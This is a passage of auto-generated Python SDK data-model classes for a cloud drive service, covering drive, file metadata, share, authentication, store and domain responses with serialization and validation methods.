# Drive 创建者
self.creator = creator
# Drive 备注信息
self.description = description
# Domain ID
self.domain_id = domain_id
# Drive ID
self.drive_id = drive_id
# Drive 名称
self.drive_name = drive_name
# Drive 类型
self.drive_type = drive_type
self.encrypt_data_access = encrypt_data_access
self.encrypt_mode = encrypt_mode
# Drive 所有者
self.owner = owner
# Drive存储基于store的相对路径,domain的PathType为OSSPath时返回
self.relative_path = relative_path
# Drive 状态
self.status = status
# 存储 ID, domain的PathType为OSSPath时返回
self.store_id = store_id
# Drive 空间总量
self.total_size = total_size
# Drive 空间已使用量
self.used_size = used_size
def validate(self):
pass
def to_map(self):
result = dict()
if self.creator is not None:
result['creator'] = self.creator
if self.description is not None:
result['description'] = self.description
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.drive_name is not None:
result['drive_name'] = self.drive_name
if self.drive_type is not None:
result['drive_type'] = self.drive_type
if self.encrypt_data_access is not None:
result['encrypt_data_access'] = self.encrypt_data_access
if self.encrypt_mode is not None:
result['encrypt_mode'] = self.encrypt_mode
if self.owner is not None:
result['owner'] = self.owner
if self.relative_path is not None:
result['relative_path'] = self.relative_path
if self.status is not None:
result['status'] = self.status
if self.store_id is not None:
result['store_id'] = self.store_id
if self.total_size is not None:
result['total_size'] = self.total_size
if self.used_size is not None:
result['used_size'] = self.used_size
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('creator') is not None:
self.creator = m.get('creator')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('drive_name') is not None:
self.drive_name = m.get('drive_name')
if m.get('drive_type') is not None:
self.drive_type = m.get('drive_type')
if m.get('encrypt_data_access') is not None:
self.encrypt_data_access = m.get('encrypt_data_access')
if m.get('encrypt_mode') is not None:
self.encrypt_mode = m.get('encrypt_mode')
if m.get('owner') is not None:
self.owner = m.get('owner')
if m.get('relative_path') is not None:
self.relative_path = m.get('relative_path')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('store_id') is not None:
self.store_id = m.get('store_id')
if m.get('total_size') is not None:
self.total_size = m.get('total_size')
if m.get('used_size') is not None:
self.used_size = m.get('used_size')
return self
class UpdateFileMetaResponse(TeaModel):
"""
更新文件元数据 response
"""
def __init__(
self,
category: str = None,
characteristic_hash: str = None,
content_hash: str = None,
content_hash_name: str = None,
content_type: str = None,
crc_64hash: str = None,
created_at: str = None,
description: str = None,
domain_id: str = None,
download_url: str = None,
drive_id: str = None,
encrypt_mode: str = None,
file_extension: str = None,
file_id: str = None,
hidden: bool = None,
image_media_metadata: ImageMediaResponse = None,
labels: List[str] = None,
meta: str = None,
name: str = None,
parent_file_id: str = None,
punish_flag: int = None,
share_id: str = None,
size: int = None,
starred: bool = None,
status: str = None,
streams_info: dict = None,
thumbnail: str = None,
trashed_at: str = None,
type: str = None,
updated_at: str = None,
upload_id: str = None,
url: str = None,
user_meta: str = None,
video_media_metadata: VideoMediaResponse = None,
video_preview_metadata: VideoPreviewResponse = None,
):
# category
self.category = category
# CharacteristicHash
self.characteristic_hash = characteristic_hash
# Content Hash
self.content_hash = content_hash
# content_hash_name
self.content_hash_name = content_hash_name
# content_type
self.content_type = content_type
# crc64_hash
self.crc_64hash = crc_64hash
# created_at
self.created_at = created_at
# description
self.description = description
# DomainID
self.domain_id = domain_id
# download_url
self.download_url = download_url
# drive_id
self.drive_id = drive_id
# encrypt_mode
self.encrypt_mode = encrypt_mode
# file_extension
self.file_extension = file_extension
# file_id
self.file_id = file_id
# Hidden
type: boolean
self.hidden = hidden
self.image_media_metadata = image_media_metadata
# labels
self.labels = labels
self.meta = meta
# name
self.name = name
# parent_file_id
self.parent_file_id = parent_file_id
self.punish_flag = punish_flag
self.share_id = share_id
# Size
self.size = size
# starred
type: boolean
self.starred = starred
# status
self.status = status
# @Deprecated streams url info
self.streams_info = streams_info
# thumbnail
self.thumbnail = thumbnail
# trashed_at
self.trashed_at = trashed_at
# type
self.type = type
# updated_at
self.updated_at = updated_at
# upload_id
self.upload_id = upload_id
# url
self.url = url
# user_meta
self.user_meta = user_meta
self.video_media_metadata = video_media_metadata
self.video_preview_metadata = video_preview_metadata
def validate(self):
if self.domain_id is not None:
self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.file_id is not None:
self.validate_max_length(self.file_id, 'file_id', 50)
self.validate_pattern(self.file_id, 'file_id', '[a-z0-9]{1,50}')
if self.image_media_metadata:
self.image_media_metadata.validate()
self.validate_required(self.name, 'name')
if self.name is not None:
self.validate_pattern(self.name, 'name', '[a-zA-Z0-9.-]{1,1000}')
if self.parent_file_id is not None:
self.validate_max_length(self.parent_file_id, 'parent_file_id', 50)
self.validate_pattern(self.parent_file_id, 'parent_file_id', '[a-z0-9]{1,50}')
if self.size is not None:
self.validate_maximum(self.size, 'size', 53687091200)
self.validate_minimum(self.size, 'size', 0)
if self.video_media_metadata:
self.video_media_metadata.validate()
if self.video_preview_metadata:
self.video_preview_metadata.validate()
def to_map(self):
result = dict()
if self.category is not None:
result['category'] = self.category
if self.characteristic_hash is not None:
result['characteristic_hash'] = self.characteristic_hash
if self.content_hash is not None:
result['content_hash'] = self.content_hash
if self.content_hash_name is not None:
result['content_hash_name'] = self.content_hash_name
if self.content_type is not None:
result['content_type'] = self.content_type
if self.crc_64hash is not None:
result['crc64_hash'] = self.crc_64hash
if self.created_at is not None:
result['created_at'] = self.created_at
if self.description is not None:
result['description'] = self.description
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.download_url is not None:
result['download_url'] = self.download_url
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.encrypt_mode is not None:
result['encrypt_mode'] = self.encrypt_mode
if self.file_extension is not None:
result['file_extension'] = self.file_extension
if self.file_id is not None:
result['file_id'] = self.file_id
if self.hidden is not None:
result['hidden'] = self.hidden
if self.image_media_metadata is not None:
result['image_media_metadata'] = self.image_media_metadata.to_map()
if self.labels is not None:
result['labels'] = self.labels
if self.meta is not None:
result['meta'] = self.meta
if self.name is not None:
result['name'] = self.name
if self.parent_file_id is not None:
result['parent_file_id'] = self.parent_file_id
if self.punish_flag is not None:
result['punish_flag'] = self.punish_flag
if self.share_id is not None:
result['share_id'] = self.share_id
if self.size is not None:
result['size'] = self.size
if self.starred is not None:
result['starred'] = self.starred
if self.status is not None:
result['status'] = self.status
if self.streams_info is not None:
result['streams_info'] = self.streams_info
if self.thumbnail is not None:
result['thumbnail'] = self.thumbnail
if self.trashed_at is not None:
result['trashed_at'] = self.trashed_at
if self.type is not None:
result['type'] = self.type
if self.updated_at is not None:
result['updated_at'] = self.updated_at
if self.upload_id is not None:
result['upload_id'] = self.upload_id
if self.url is not None:
result['url'] = self.url
if self.user_meta is not None:
result['user_meta'] = self.user_meta
if self.video_media_metadata is not None:
result['video_media_metadata'] = self.video_media_metadata.to_map()
if self.video_preview_metadata is not None:
result['video_preview_metadata'] = self.video_preview_metadata.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('category') is not None:
self.category = m.get('category')
if m.get('characteristic_hash') is not None:
self.characteristic_hash = m.get('characteristic_hash')
if m.get('content_hash') is not None:
self.content_hash = m.get('content_hash')
if m.get('content_hash_name') is not None:
self.content_hash_name = m.get('content_hash_name')
if m.get('content_type') is not None:
self.content_type = m.get('content_type')
if m.get('crc64_hash') is not None:
self.crc_64hash = m.get('crc64_hash')
if m.get('created_at') is not None:
self.created_at = m.get('created_at')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('download_url') is not None:
self.download_url = m.get('download_url')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('encrypt_mode') is not None:
self.encrypt_mode = m.get('encrypt_mode')
if m.get('file_extension') is not None:
self.file_extension = m.get('file_extension')
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
if m.get('hidden') is not None:
self.hidden = m.get('hidden')
if m.get('image_media_metadata') is not None:
temp_model = ImageMediaResponse()
self.image_media_metadata = temp_model.from_map(m['image_media_metadata'])
if m.get('labels') is not None:
self.labels = m.get('labels')
if m.get('meta') is not None:
self.meta = m.get('meta')
if m.get('name') is not None:
self.name = m.get('name')
if m.get('parent_file_id') is not None:
self.parent_file_id = m.get('parent_file_id')
if m.get('punish_flag') is not None:
self.punish_flag = m.get('punish_flag')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('size') is not None:
self.size = m.get('size')
if m.get('starred') is not None:
self.starred = m.get('starred')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('streams_info') is not None:
self.streams_info = m.get('streams_info')
if m.get('thumbnail') is not None:
self.thumbnail = m.get('thumbnail')
if m.get('trashed_at') is not None:
self.trashed_at = m.get('trashed_at')
if m.get('type') is not None:
self.type = m.get('type')
if m.get('updated_at') is not None:
self.updated_at = m.get('updated_at')
if m.get('upload_id') is not None:
self.upload_id = m.get('upload_id')
if m.get('url') is not None:
self.url = m.get('url')
if m.get('user_meta') is not None:
self.user_meta = m.get('user_meta')
if m.get('video_media_metadata') is not None:
temp_model = VideoMediaResponse()
self.video_media_metadata = temp_model.from_map(m['video_media_metadata'])
if m.get('video_preview_metadata') is not None:
temp_model = VideoPreviewResponse()
self.video_preview_metadata = temp_model.from_map(m['video_preview_metadata'])
return self
class UpdateShareResponse(TeaModel):
"""
Update share response
"""
def __init__(
self,
created_at: str = None,
creator: str = None,
description: str = None,
domain_id: str = None,
drive_id: str = None,
expiration: str = None,
expired: bool = None,
owner: str = None,
permissions: List[str] = None,
share_file_id: str = None,
share_file_path: str = None,
share_id: str = None,
share_name: str = None,
share_policy: List[SharePermissionPolicy] = None,
status: str = None,
updated_at: str = None,
):
# created_at
self.created_at = created_at
# creator
self.creator = creator
# description
self.description = description
# domain_id
self.domain_id = domain_id
# drive_id
self.drive_id = drive_id
# expiration
self.expiration = expiration
# expired
self.expired = expired
# owner
self.owner = owner
# permissions
self.permissions = permissions
# share_file_id
self.share_file_id = share_file_id
# share_path
self.share_file_path = share_file_path
# share_id
self.share_id = share_id
# share_name
self.share_name = share_name
self.share_policy = share_policy
# status
self.status = status
# updated_at
self.updated_at = updated_at
def validate(self):
if self.share_policy:
for k in self.share_policy:
if k:
k.validate()
def to_map(self):
result = dict()
if self.created_at is not None:
result['created_at'] = self.created_at
if self.creator is not None:
result['creator'] = self.creator
if self.description is not None:
result['description'] = self.description
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.expiration is not None:
result['expiration'] = self.expiration
if self.expired is not None:
result['expired'] = self.expired
if self.owner is not None:
result['owner'] = self.owner
if self.permissions is not None:
result['permissions'] = self.permissions
if self.share_file_id is not None:
result['share_file_id'] = self.share_file_id
if self.share_file_path is not None:
result['share_file_path'] = self.share_file_path
if self.share_id is not None:
result['share_id'] = self.share_id
if self.share_name is not None:
result['share_name'] = self.share_name
result['share_policy'] = []
if self.share_policy is not None:
for k in self.share_policy:
result['share_policy'].append(k.to_map() if k else None)
if self.status is not None:
result['status'] = self.status
if self.updated_at is not None:
result['updated_at'] = self.updated_at
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('created_at') is not None:
self.created_at = m.get('created_at')
if m.get('creator') is not None:
self.creator = m.get('creator')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('expiration') is not None:
self.expiration = m.get('expiration')
if m.get('expired') is not None:
self.expired = m.get('expired')
if m.get('owner') is not None:
self.owner = m.get('owner')
if m.get('permissions') is not None:
self.permissions = m.get('permissions')
if m.get('share_file_id') is not None:
self.share_file_id = m.get('share_file_id')
if m.get('share_file_path') is not None:
self.share_file_path = m.get('share_file_path')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('share_name') is not None:
self.share_name = m.get('share_name')
self.share_policy = []
if m.get('share_policy') is not None:
for k in m.get('share_policy'):
temp_model = SharePermissionPolicy()
self.share_policy.append(temp_model.from_map(k))
if m.get('status') is not None:
self.status = m.get('status')
if m.get('updated_at') is not None:
self.updated_at = m.get('updated_at')
return self
class UserAuthentication(TeaModel):
"""
*\
"""
def __init__(
self,
authentication_type: str = None,
created_at: int = None,
detail: str = None,
domain_id: str = None,
identity: str = None,
last_login_time: int = None,
status: str = None,
user_id: str = None,
extra: str = None,
):
# 认证类型
self.authentication_type = authentication_type
# 创建时间
self.created_at = created_at
# 详情
self.detail = detail
# Domain ID
self.domain_id = domain_id
# 唯一身份标识
self.identity = identity
# 最后登录时间
self.last_login_time = last_login_time
# 状态
self.status = status
# 用户ID
self.user_id = user_id
# 额外的信息,比如type为mobile时,此字段为国家编号,不填默认86
self.extra = extra
def validate(self):
self.validate_required(self.authentication_type, 'authentication_type')
self.validate_required(self.created_at, 'created_at')
self.validate_required(self.detail, 'detail')
self.validate_required(self.domain_id, 'domain_id')
self.validate_required(self.identity, 'identity')
self.validate_required(self.last_login_time, 'last_login_time')
self.validate_required(self.status, 'status')
self.validate_required(self.user_id, 'user_id')
def to_map(self):
result = dict()
if self.authentication_type is not None:
result['AuthenticationType'] = self.authentication_type
if self.created_at is not None:
result['CreatedAt'] = self.created_at
if self.detail is not None:
result['Detail'] = self.detail
if self.domain_id is not None:
result['DomainID'] = self.domain_id
if self.identity is not None:
result['Identity'] = self.identity
if self.last_login_time is not None:
result['LastLoginTime'] = self.last_login_time
if self.status is not None:
result['Status'] = self.status
if self.user_id is not None:
result['UserID'] = self.user_id
if self.extra is not None:
result['extra'] = self.extra
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('AuthenticationType') is not None:
self.authentication_type = m.get('AuthenticationType')
if m.get('CreatedAt') is not None:
self.created_at = m.get('CreatedAt')
if m.get('Detail') is not None:
self.detail = m.get('Detail')
if m.get('DomainID') is not None:
self.domain_id = m.get('DomainID')
if m.get('Identity') is not None:
self.identity = m.get('Identity')
if m.get('LastLoginTime') is not None:
self.last_login_time = m.get('LastLoginTime')
if m.get('Status') is not None:
self.status = m.get('Status')
if m.get('UserID') is not None:
self.user_id = m.get('UserID')
if m.get('extra') is not None:
self.extra = m.get('extra')
return self
class VerifyCodeRequest(TeaModel):
"""
*\
"""
def __init__(
self,
headers: Dict[str, str] = None,
app_id: str = None,
phone_number: str = None,
phone_region: str = None,
sms_code: str = None,
sms_code_id: str = None,
verify_type: str = None,
):
self.headers = headers
# App ID, 当前访问的App
self.app_id = app_id
# 手机号
self.phone_number = phone_number
# 国家编号,默认86,不需要填+号,直接填数字
self.phone_region = phone_region
# 短信验证码内容
self.sms_code = sms_code
# 短信验证码ID
self.sms_code_id = sms_code_id
# 需要被校验内容的类型
self.verify_type = verify_type
def validate(self):
self.validate_required(self.app_id, 'app_id')
self.validate_required(self.phone_number, 'phone_number')
self.validate_required(self.sms_code, 'sms_code')
self.validate_required(self.sms_code_id, 'sms_code_id')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.app_id is not None:
result['app_id'] = self.app_id
if self.phone_number is not None:
result['phone_number'] = self.phone_number
if self.phone_region is not None:
result['phone_region'] = self.phone_region
if self.sms_code is not None:
result['sms_code'] = self.sms_code
if self.sms_code_id is not None:
result['sms_code_id'] = self.sms_code_id
if self.verify_type is not None:
result['verify_type'] = self.verify_type
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('app_id') is not None:
self.app_id = m.get('app_id')
if m.get('phone_number') is not None:
self.phone_number = m.get('phone_number')
if m.get('phone_region') is not None:
self.phone_region = m.get('phone_region')
if m.get('sms_code') is not None:
self.sms_code = m.get('sms_code')
if m.get('sms_code_id') is not None:
self.sms_code_id = m.get('sms_code_id')
if m.get('verify_type') is not None:
self.verify_type = m.get('verify_type')
return self
class Store(TeaModel):
"""
*\
"""
def __init__(
self,
accelerate_endpoint: str = None,
base_path: str = None,
bucket: str = None,
cdn_endpoint: str = None,
customized_accelerate_endpoint: str = None,
customized_cdn_endpoint: str = None,
customized_endpoint: str = None,
customized_internal_endpoint: str = None,
endpoint: str = None,
internal_endpoint: str = None,
location: str = None,
ownership: str = None,
policy: str = None,
role_arn: str = None,
store_id: str = None,
type: str = None,
):
# 全球加速地址
self.accelerate_endpoint = accelerate_endpoint
# 存储公共前缀
self.base_path = base_path
# bucket名称
self.bucket = bucket
# 内容分发地址
self.cdn_endpoint = cdn_endpoint
# 自定义全球加速地址
self.customized_accelerate_endpoint = customized_accelerate_endpoint
# 自定义内容分发地址
self.customized_cdn_endpoint = customized_cdn_endpoint
# 自定义Public访问地址
self.customized_endpoint = customized_endpoint
# 自定义vpc访问地址
self.customized_internal_endpoint = customized_internal_endpoint
# Public访问地址
self.endpoint = endpoint
# vpc访问地址
self.internal_endpoint = internal_endpoint
# 地点
self.location = location
# 存储归属,system表示系统提供,custom表示使用自己的存储
self.ownership = ownership
# Policy授权,system类型store会将bucket权限授予当前云账号
self.policy = policy
# 访问Bucket的角色ARN
self.role_arn = role_arn
# store ID
self.store_id = store_id
# 存储类型,当前只支持oss
self.type = type
def validate(self):
self.validate_required(self.bucket, 'bucket')
self.validate_required(self.endpoint, 'endpoint')
self.validate_required(self.ownership, 'ownership')
self.validate_required(self.policy, 'policy')
self.validate_required(self.store_id, 'store_id')
self.validate_required(self.type, 'type')
def to_map(self):
result = dict()
if self.accelerate_endpoint is not None:
result['accelerate_endpoint'] = self.accelerate_endpoint
if self.base_path is not None:
result['base_path'] = self.base_path
if self.bucket is not None:
result['bucket'] = self.bucket
if self.cdn_endpoint is not None:
result['cdn_endpoint'] = self.cdn_endpoint
if self.customized_accelerate_endpoint is not None:
result['customized_accelerate_endpoint'] = self.customized_accelerate_endpoint
if self.customized_cdn_endpoint is not None:
result['customized_cdn_endpoint'] = self.customized_cdn_endpoint
if self.customized_endpoint is not None:
result['customized_endpoint'] = self.customized_endpoint
if self.customized_internal_endpoint is not None:
result['customized_internal_endpoint'] = self.customized_internal_endpoint
if self.endpoint is not None:
result['endpoint'] = self.endpoint
if self.internal_endpoint is not None:
result['internal_endpoint'] = self.internal_endpoint
if self.location is not None:
result['location'] = self.location
if self.ownership is not None:
result['ownership'] = self.ownership
if self.policy is not None:
result['policy'] = self.policy
if self.role_arn is not None:
result['role_arn'] = self.role_arn
if self.store_id is not None:
result['store_id'] = self.store_id
if self.type is not None:
result['type'] = self.type
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('accelerate_endpoint') is not None:
self.accelerate_endpoint = m.get('accelerate_endpoint')
if m.get('base_path') is not None:
self.base_path = m.get('base_path')
if m.get('bucket') is not None:
self.bucket = m.get('bucket')
if m.get('cdn_endpoint') is not None:
self.cdn_endpoint = m.get('cdn_endpoint')
if m.get('customized_accelerate_endpoint') is not None:
self.customized_accelerate_endpoint = m.get('customized_accelerate_endpoint')
if m.get('customized_cdn_endpoint') is not None:
self.customized_cdn_endpoint = m.get('customized_cdn_endpoint')
if m.get('customized_endpoint') is not None:
self.customized_endpoint = m.get('customized_endpoint')
if m.get('customized_internal_endpoint') is not None:
self.customized_internal_endpoint = m.get('customized_internal_endpoint')
if m.get('endpoint') is not None:
self.endpoint = m.get('endpoint')
if m.get('internal_endpoint') is not None:
self.internal_endpoint = m.get('internal_endpoint')
if m.get('location') is not None:
self.location = m.get('location')
if m.get('ownership') is not None:
self.ownership = m.get('ownership')
if m.get('policy') is not None:
self.policy = m.get('policy')
if m.get('role_arn') is not None:
self.role_arn = m.get('role_arn')
if m.get('store_id') is not None:
self.store_id = m.get('store_id')
if m.get('type') is not None:
self.type = m.get('type')
return self
class ListStoresResponse(TeaModel):
"""
*\
"""
def __init__(
self,
items: List[Store] = None,
):
# Store 列表
self.items = items
def validate(self):
self.validate_required(self.items, 'items')
if self.items:
for k in self.items:
if k:
k.validate()
def to_map(self):
result = dict()
result['items'] = []
if self.items is not None:
for k in self.items:
result['items'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
self.items = []
if m.get('items') is not None:
for k in m.get('items'):
temp_model = Store()
self.items.append(temp_model.from_map(k))
return self
class AdminListStoresModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: ListStoresResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = ListStoresResponse()
self.body = temp_model.from_map(m['body'])
return self
class GetUserAccessTokenModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: AccessTokenResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = AccessTokenResponse()
self.body = temp_model.from_map(m['body'])
return self
class AddStoreResponse(TeaModel):
"""
*\
"""
def __init__(
self,
accelerate_endpoint: str = None,
base_path: str = None,
bucket: str = None,
cdn_endpoint: str = None,
customized_accelerate_endpoint: str = None,
customized_cdn_endpoint: str = None,
customized_endpoint: str = None,
customized_internal_endpoint: str = None,
domain_id: str = None,
endpoint: str = None,
internal_endpoint: str = None,
location: str = None,
ownership: str = None,
policy: str = None,
role_arn: str = None,
store_id: str = None,
type: str = None,
):
# 全球加速地址
self.accelerate_endpoint = accelerate_endpoint
# 存储公共前缀
self.base_path = base_path
# bucket名称
self.bucket = bucket
# 内容分发地址
self.cdn_endpoint = cdn_endpoint
# 自定义全球加速地址
self.customized_accelerate_endpoint = customized_accelerate_endpoint
# 自定义内容分发地址
self.customized_cdn_endpoint = customized_cdn_endpoint
# 自定义Public访问地址
self.customized_endpoint = customized_endpoint
# 自定义vpc访问地址
self.customized_internal_endpoint = customized_internal_endpoint
# domain ID
self.domain_id = domain_id
# Public访问地址
self.endpoint = endpoint
# vpc访问地址
self.internal_endpoint = internal_endpoint
# 地点
self.location = location
# 存储归属,system表示系统提供,custom表示使用自己的存储
self.ownership = ownership
# Policy授权,system类型store会将bucket权限授予当前云账号
self.policy = policy
# 访问Bucket的角色ARN
self.role_arn = role_arn
# store ID
self.store_id = store_id
# 存储类型,当前只支持oss
self.type = type
def validate(self):
self.validate_required(self.bucket, 'bucket')
self.validate_required(self.domain_id, 'domain_id')
self.validate_required(self.endpoint, 'endpoint')
self.validate_required(self.ownership, 'ownership')
self.validate_required(self.policy, 'policy')
self.validate_required(self.store_id, 'store_id')
self.validate_required(self.type, 'type')
def to_map(self):
result = dict()
if self.accelerate_endpoint is not None:
result['accelerate_endpoint'] = self.accelerate_endpoint
if self.base_path is not None:
result['base_path'] = self.base_path
if self.bucket is not None:
result['bucket'] = self.bucket
if self.cdn_endpoint is not None:
result['cdn_endpoint'] = self.cdn_endpoint
if self.customized_accelerate_endpoint is not None:
result['customized_accelerate_endpoint'] = self.customized_accelerate_endpoint
if self.customized_cdn_endpoint is not None:
result['customized_cdn_endpoint'] = self.customized_cdn_endpoint
if self.customized_endpoint is not None:
result['customized_endpoint'] = self.customized_endpoint
if self.customized_internal_endpoint is not None:
result['customized_internal_endpoint'] = self.customized_internal_endpoint
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.endpoint is not None:
result['endpoint'] = self.endpoint
if self.internal_endpoint is not None:
result['internal_endpoint'] = self.internal_endpoint
if self.location is not None:
result['location'] = self.location
if self.ownership is not None:
result['ownership'] = self.ownership
if self.policy is not None:
result['policy'] = self.policy
if self.role_arn is not None:
result['role_arn'] = self.role_arn
if self.store_id is not None:
result['store_id'] = self.store_id
if self.type is not None:
result['type'] = self.type
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('accelerate_endpoint') is not None:
self.accelerate_endpoint = m.get('accelerate_endpoint')
if m.get('base_path') is not None:
self.base_path = m.get('base_path')
if m.get('bucket') is not None:
self.bucket = m.get('bucket')
if m.get('cdn_endpoint') is not None:
self.cdn_endpoint = m.get('cdn_endpoint')
if m.get('customized_accelerate_endpoint') is not None:
self.customized_accelerate_endpoint = m.get('customized_accelerate_endpoint')
if m.get('customized_cdn_endpoint') is not None:
self.customized_cdn_endpoint = m.get('customized_cdn_endpoint')
if m.get('customized_endpoint') is not None:
self.customized_endpoint = m.get('customized_endpoint')
if m.get('customized_internal_endpoint') is not None:
self.customized_internal_endpoint = m.get('customized_internal_endpoint')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('endpoint') is not None:
self.endpoint = m.get('endpoint')
if m.get('internal_endpoint') is not None:
self.internal_endpoint = m.get('internal_endpoint')
if m.get('location') is not None:
self.location = m.get('location')
if m.get('ownership') is not None:
self.ownership = m.get('ownership')
if m.get('policy') is not None:
self.policy = m.get('policy')
if m.get('role_arn') is not None:
self.role_arn = m.get('role_arn')
if m.get('store_id') is not None:
self.store_id = m.get('store_id')
if m.get('type') is not None:
self.type = m.get('type')
return self
class AdminListStoresRequest(TeaModel):
"""
*\
"""
def __init__(
self,
headers: Dict[str, str] = None,
):
self.headers = headers
def validate(self):
pass
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
return self
class BaseDomainResponse(TeaModel):
"""
base domain response
"""
def __init__(
self,
api_cname: str = None,
app_cname: str = None,
auth_alipay_app_id: str = None,
auth_alipay_enable: bool = None,
auth_alipay_private_key: str = None,
auth_cname: str = None,
auth_config: dict = None,
auth_dingding_app_id: str = None,
auth_dingding_app_secret: str = None,
auth_dingding_enable: bool = None,
auth_endpoint_enable: bool = None,
auth_ram_app_id: str = None,
auth_ram_app_secret: str = None,
auth_ram_enable: bool = None,
created_at: str = None,
data_hash_name: str = None,
description: str = None,
domain_id: str = None,
domain_name: str = None,
event_filename_matches: str = None,
event_mns_endpoint: str = None,
event_mns_topic: str = None,
event_names: List[str] = None,
event_role_arn: str = None,
init_drive_enable: bool = None,
init_drive_size: int = None,
init_drive_store_id: str = None,
mode: str = None,
path_type: str = None,
published_app_access_strategy: AppAccessStrategy = None,
sharable: bool = None,
store_level: str = None,
store_region_list: List[str] = None,
updated_at: str = None,
):
# Domain APICName
self.api_cname = api_cname
# Domain AppCName
self.app_cname = app_cname
# 支付宝 App Id
self.auth_alipay_app_id = auth_alipay_app_id
# 是否开启了支付宝认证
self.auth_alipay_enable = auth_alipay_enable
# 支付宝 App Secret
self.auth_alipay_private_key = auth_alipay_private_key
# Domain AuthCName
self.auth_cname = auth_cname
# 登录相关信息
self.auth_config = auth_config
# 钉钉 App Id
self.auth_dingding_app_id = auth_dingding_app_id
# 钉钉 App Secret
self.auth_dingding_app_secret = auth_dingding_app_secret
# 是否开启了钉钉认证
self.auth_dingding_enable = auth_dingding_enable
self.auth_endpoint_enable = auth_endpoint_enable
# RAM App Id
self.auth_ram_app_id = auth_ram_app_id
# RAM App Secret
self.auth_ram_app_secret = auth_ram_app_secret
# 是否开启了 RAM 认证
self.auth_ram_enable = auth_ram_enable
# Domain 创建时间
self.created_at = created_at
# 数据 Hash 算法
self.data_hash_name = data_hash_name
# Domain 描述
self.description = description
# Domain ID
self.domain_id = domain_id
# Domain 描述
self.domain_name = domain_name
# 事件通知 MNS 匹配文件名
self.event_filename_matches = event_filename_matches
# 事件通知 MNS Endpoint
self.event_mns_endpoint = event_mns_endpoint
# 事件通知 MNS Topic
self.event_mns_topic = event_mns_topic
# 事件名列表
self.event_names = event_names
# 事件通知 Role Arn
self.event_role_arn = event_role_arn
# 是否开启了自动初始化 Drive
self.init_drive_enable = init_drive_enable
# 自动初始化 Drive 大小
self.init_drive_size = init_drive_size
# 自动初始化 Drive 所用 Store ID
self.init_drive_store_id = init_drive_store_id
# Domain 类型
self.mode = mode
# Domain 类型
self.path_type = path_type
self.published_app_access_strategy = published_app_access_strategy
# 是否开启了分享
self.sharable = sharable
# 存储级别
self.store_level = store_level
# 存储 Region 列表
self.store_region_list = store_region_list
# Domain 更新时间
self.updated_at = updated_at
def validate(self):
if self.published_app_access_strategy:
self.published_app_access_strategy.validate()
def to_map(self):
result = dict()
if self.api_cname is not None:
result['api_cname'] = self.api_cname
if self.app_cname is not None:
result['app_cname'] = self.app_cname
if self.auth_alipay_app_id is not None:
result['auth_alipay_app_id'] = self.auth_alipay_app_id
if self.auth_alipay_enable is not None:
result['auth_alipay_enable'] = self.auth_alipay_enable
if self.auth_alipay_private_key is not None:
result['auth_alipay_private_key'] = self.auth_alipay_private_key
if self.auth_cname is not None:
result['auth_cname'] = self.auth_cname
if self.auth_config is not None:
result['auth_config'] = self.auth_config
if self.auth_dingding_app_id is not None:
result['auth_dingding_app_id'] = self.auth_dingding_app_id
if self.auth_dingding_app_secret is not None:
result['auth_dingding_app_secret'] = self.auth_dingding_app_secret
if self.auth_dingding_enable is not None:
result['auth_dingding_enable'] = self.auth_dingding_enable
if self.auth_endpoint_enable is not None:
result['auth_endpoint_enable'] = self.auth_endpoint_enable
if self.auth_ram_app_id is not None:
result['auth_ram_app_id'] = self.auth_ram_app_id
if self.auth_ram_app_secret is not None:
